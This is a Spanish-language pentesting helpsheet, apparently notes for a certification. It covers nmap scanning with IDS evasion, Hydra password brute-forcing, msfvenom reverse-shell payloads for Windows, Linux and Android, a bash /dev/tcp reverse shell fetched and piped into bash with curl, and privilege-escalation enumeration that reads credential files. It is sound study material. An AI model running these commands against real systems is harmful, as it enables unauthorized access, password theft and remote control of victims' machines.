¡DISCLAIMER! Esta helpsheet es bajo mi conocimiento, claramente hay otros metodos u otras formas de hacer los comandos en la terminal

H A C K I N G   I N   P R O G R E S S:
██ 20% ... 
███ 40% .... 
████ 60% ..... 
█████ 80% ......
██████ 100% ....... COMPLETED


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@(@@ #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@(   ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@, @@@@@@@@@@        @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .@@@@@@@@@@@%         @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ *@@@@@@@@@@@@           &@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  @@@@@#                   (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  @@@@@@@@@@@@%*.            (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.   *@@%     (@@@@@@@@@        %@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@     @@@@@@@@@@@@@@@@@@@@@@      @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.     @@@@@@@@@@@@@@@@@@@@@@@@@*      /@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@            @@@@@@@@@@@@@@@@@@@@@@%              @@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@   @@@@@@ @#   @@@@@@@@@@@@@@@@@@@   @@@# &@@#     @@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@   @@@@@@@@@@@@@  @@@@@@@@@@@@@@@@ @@@@@@@@@@@  @@   ,@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@.   @@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@   @@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@      @@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@     @@@@@@@@@                                           @@@@@@  #@   @@@@@@@@@@@@@@@
@@@@@@@@@@@@@@    @@ %@@@@@@@ *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  @@@@@@@@@@      @@@@@@@@@@@@
@@@@@@@@@@@    (@@@(@@@@@@@@@ ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  @@@@@@@@@@@@    #@@@@@@@@@@@
@@@@@@@@*          @@@@@@@@@@. @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ (@@@@@@@@@@  @.   @@@@@@@@@@@
@@@@@@@              .&@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@         @@@@@@@@
@@@@@@%@@@@@@@@@@@@%  %@@@@@@@ @@@@@@@@@@@@@@@@(     @@@@@@@@@@@@@@@@@ @@@@@@          @@@@@@ @@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@,      #@@@@@@@@@@@@@@@ @@@@@@@@@@@@,  @@ @@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

---------------------


W E L C O M E   T O   T H E   H A C K:

Fases del pentesting:

1-Enumeracion
2-Escaneo
3-Explotación
4-Post-explotación
5-Informe

25 - SMTP
22 - SSH
110 - POP3
143 - IMAP
80 - HTTP
443 - HTTPS
8080, 8081 - HTTP Proxy
137, 138, 139 - NETBIOS
115 - SFTP
23 - Telnet
21 - FTP
3389 - RDP
3306 - MySQL
1433 - MS SQL Server
445 - SMB
123 - NTP
179 - BGP
69 - TFTP
88 - Kerberos
102 - MS Exchange
53 - DNS
5985 - winRM HTTP
5986 - winRM HTTPS

Basic Commands:

cd -- Desplazarse entre directorios
mv -- Mover ficheros o directorios 
cp -- Copiar ficheros
mkdir -- Crear directorios
rmdir -- Eliminar directorios
cat -- Enseñar el texto de un archivo
nano -- Crear un archivo txt o similar o enseñar el texto
sudo -- Usar comandos de super usuario
pwd -- Saber la ruta actual en la que te encuentras
touch -- Crear archivos
locate -- Localizar un archivo
find -- encontrar un determinado archivo
grep -- A la hora de hacer una tuberia, se usa para localizar una palabra dentro de un texto
chmod -- Modificar permisos de archivos o directorios
chown -- Permite cambiar el propietario de un archivo o un directorio
wget -- Recuperar material en linea
uname -- Nos provee de valiosa información del un sistema Linux
man -- Documentar y aprender sobre comandos, archivos, llamadas de sistema, etc
history -- Enseña el historial de la terminal
echo --  Impresión de un texto en pantalla
alias -- Es un shortcut que sustituye al comando complejo
su -- Permite usar el intérprete de comandos de otro usuario sin necesidad de cerrar la sesión
ping -- Envía una señal simple a un destino o destinatario concreto que responde automáticamente con una señal de confirmación
ifconfig / ip a --  Se mostrarán todas las direcciones IP de tu red

:::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::

--------------------- Nmap [Escaneo de puertos]

sudo nmap -A -T4 -sC -sV -p- <RHOST> # Escanea Sistema Operativo y Servicios, Modo Agresivo, Escanea con una lista default de scripts pertenecienetes a nmap, Detecta servicios y versiones y escanea todos los puertos
sudo nmap -sV -sU <RHOST> # Detecta servicios y versiones y realiza escaneo UDP
sudo nmap -A -T4 -sC -sV --script vuln <RHOST> # Escanea Sistema Operativo y Servicios, Modo Agresivo, Escanea con una lista default de scripts pertenecienetes a nmap, Detecta servicios y versiones y lanza todos los scripts de deteccion de contenido NSE
sudo nmap -sn -PR --spoof-mac <mac address> <target> # El MAC spoofing puede permitirnos falsificar el origen de nuestras conexiones y puede resultar útil para evadir los sistemas IDS. Es posible falsificar su dirección MAC mientras realiza un escaneo de ping ARP.
sudo nmap -sP [Red a la que estas conectado/mascara] # Hace un barrido de red y te muestra las ip's conectadas a la misma red que tu (IMPORTANTE PARA CAJA NEGRA ESTILO EJPTV2)
sudo nmap -sN [Red a la que estas conectado/mascara] # Un barrido de red sin necesidad de hacer ping (Muestra la mac)
sudo nmap -sT [IP] # Analizar puertos TCP
sudo nmap -sU [IP] # Analizar puertos UDP
sudo nmap -O [IP] # Te dice el sistema operativo
sudo nmap [IP] --script vuln -p[PUERTO] 

--------------------- Netdiscover

sudo netdiscover -r 192.168.1.0/24 // o IP de red // Escanea los dispositivos conectados a la red 

--------------------- Reverse Shell msfvenom

# Para Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Nuestra_IP> LPORT=<Port> -f exe -o payload.exe

# Para Linux
msfvenom -p linux/meterpreter/reverse_tcp LHOST=<Nuestra_IP> LPORT=<Port> -o troyano 

# Para Android 
msfvenom -p android/meterpreter/reverse_tcp LHOST=<Nuestra_IP> LPORT=<Port> -o payload.apk

--------------------- Transferencia de archivos

sudo python3 -m http.server 8080
sudo python -m SimpleHTTPServer 8080

# Para Linux: 

wget http://[IP]/recurso
         
# Para Windows:

powershell -c "Invoke-WebRequest -Uri 'http://[IP]:[PUERTO]/recurso' -OutFile 'C:\Windows\Temp\nombrequequeramos'"

--------------------- Netcat [Poner x puerto en escucha]

nc -nlvp <Port>

--------------------- Metasploit
Escribir en la consola msfconsole para empezar a usar metasploit

locate (para saber la ruta de un sploit por ejemplo)

show -- mostrar, ver...
search -- busca, filtra...

auxuliary no es un comando, es una categoria de metasploit que escanea, saca informacion, etc. LOS AUXILIARY NO EXPLOTAN NADA, SIMPLEMENTE ESCANEA.

set -- seleccion, elige, se trabaja... (version antigua)
use -- "" (version nueva)
run -- lanza exploit, auxiliary...

--------------------- Hydra

-L archivo de usuarios
-l usuario
-P archivo de contraseñas

hydra -L users.txt -P pass.txt IP ssh (ssh indica el final)
hydra -L [user diccionario] -P [password diccionario] [ip] [protocolo] 
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt [IP] http-post-form "[URL]:[TOKEN-URL]:Invalid Username" 
hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://10.10.36.145/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=17mm5k1jmmkcnes87ttmi63603; security=low; security=low:F=Username and/or password incorrect'

--------------------- Gobuster

gobuster dir --url http://[IP or URL] --wordlist /usr/share/wordlists/dirb/big.txt

--------------------- Dirsearch

dirsearch -u http://[IP or URL]/ /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,txt,html -f

--------------------- RDP

xfreerdp /u:[USER] /p:[PASSWORD] /v:[IP] /cert-ignore -- Para conectarse por RDP a un equipo

--------------------- WPSCAN

wpscan --url [URL] --enumerate ap,at,dbe,cb,u
wpscan --url [URL] -U <NAME 1> -P /usr/share/wordlists/<wordlist>  [Ataque de diccionario]

--------------------- ENUM PRIVESC

     Linux
          sudo -l
          whoami
          uname -a
          ls -la
          ss -tulwn
          cat /etc/crontab
          cat /etc/passwd
          find / -perm -u=s -type f 2>/dev/null
          find / -type f -name [file] 2> /dev/null
          find / -perm -4000 2>/dev/null
          hostname
          cat /proc/version
          history
          ifconfig
          netstat
          pwd
          env
          getcap -r / 2>/dev/null
          systemctl list-timers
          pspy
          *Si tras ganar acceso a una shell en la maquina objetivo, somos un usuario con pocos privilegios pero tenemos acceso a /var/www/html podemos buscar mediante el siguiente comando find archivos de configuracion que contengan contraseñas o datos sensibles, para empezar a ganar privilegios: find . -iname '*config*' -type f -exec grep -nie 'pass.*=' --color=always /dev/null {} \;

     Windows
          hostname
          whoami
          whoami /priv
          syteminfo
          ipconfig
          cmdkey /list
          icacls
          schtasks /query
          dir
          sc
          set
          netstat
          reg /query
          sc query windefend
          sc queryex type=service

--------------------- TRATAMIENTO TTY

Linux:

   script /dev/null -c bash // python -c 'import pty;pty.spawn("/bin/bash")'
   ctrl+z
   stty raw-echo
   fg
   reset
   xterm
   export TERM=xterm
   export SHELL=bash
   stty rows 52 columns 180

Windows:

https://github.com/antonioCoco/ConPtyShell

--------------------- SMB

enum4linux -a <IP address>
smbclient -L IP -N

    Para conectarse:
        smbclient //IP/RECURSO -n
    Una vez dentro para descargar archivos:
        prompt off
        mget *
        smbget -R smb://IP/recurso

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [IP]
smbmap -H [IP]
smbmap -H [IP] -u [user] -p [password] -- probar usuario y una única contraseña para ver recursos compartidos
crackmapexec smb [IP] -u '' -p '' --user --> enumerar usuarios 
crackmapexec smb [IP] -u [user] -p [passwords] -- probar usarios y contraseñas
smbmap 

--------------------- Reverse Shell

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
 
1- Creamos un script .sh con bash -i >& /dev/tcp/IP/PUERTO 0>&1
2- Compartimos ese archivo mediante python -m....
3- Lo ejecutamos /usr/bin/curl IP/ARCHIVO|bash

--------------------- Upload file bypass

https://book.hacktricks.xyz/pentesting-web/file-upload

--------------------- Metasploit

msfconsole (Abrir el metasploit)
msfbd -h (Enseña banderas para poder usar)
msfdb start (Iniciar base de datos)
msfdb init (Inicializar base de datos)
msfdb status (Comprobar si esta todo correcto)
db_nmap [IP] (Hace un escaneo de nmap dentro de metasploit)
services (Despues del nmap, te resume todo en los servicios)

--------------------- Getcap

getcap -r / 2>/dev/null (Puedes buscar binarios con capacidades)
